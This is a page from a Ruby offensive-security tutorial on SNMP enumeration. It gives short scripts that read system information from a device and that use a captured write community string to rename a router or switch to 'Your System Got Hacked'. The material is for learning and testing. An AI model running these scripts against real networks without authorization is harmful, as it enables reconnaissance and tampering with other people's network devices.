SNMP Enumeration

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee
Search…
SNMP Enumeration
Install ruby-snmp
1
gem install snmp
Copied!
Get Request
Miss configure an SNMP service would gives an attacker a huge mount of information. Let's to see you we can interact with the server to retrieve some info.
1
# KING SABRI | @KINGSABRI
2
require 'snmp'
3
​
4
# Connect to SNMP server
5
manager = SNMP::Manager.new(:host => '192.168.0.17')
6
​
7
# General info
8
puts "SNMP Version: " + manager.config[:version]
9
puts "Community: " + manager.config[:community]
10
puts "Write Community: " + manager.config[:WriteCommunity]
11
​
12
​
13
# Get hostname, contact and location
14
hostname = manager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s}       # manager.get("sysName.0").varbind_list[0]
15
contact  = manager.get("sysContact.0").each_varbind.map {|vb| vb.value.to_s}    # manager.get("sysContact.0").varbind_list[0]
16
location = manager.get("sysLocation.0").each_varbind.map {|vb| vb.value.to_s}   # manager.get("sysLocation.0").varbind_list[0]
17
​
18
# It would take an array of OIDs
19
response = manager.get(["sysName.0", "sysContact.0", "sysLocation.0"])
20
response.each_varbind do |vb|
21
    puts vb.value.to_s
22
end
Copied!
Note: the OID names are case sensitive
Set Request
Sometimes we get luck and we get the private/management string of SNMP. At this moment we might be able to apply changes on the system, router, switches configurations.
1
require 'snmp'
2
include SNMP
3
​
4
# Connect to SNMP server
5
manager = SNMP::Manager.new(:host => '192.168.0.17')
6
# Config our request to OID
7
varbind = VarBind.new("1.3.6.1.2.1.1.5.0", OctetString.new("Your System Got Hacked"))
8
# Send your request with varbind our settings
9
manager.set(varbind)
10
# Check our changes
11
manager.get("sysName.0").each_varbind.map {|vb| vb.value.to_s}
12
manager.close
Copied!
[1]: https://github.com/hallidave/ruby-snmp/​
DNS Enumeration
Packet Manipulation
Copy link
Contents
Get Request
Set Request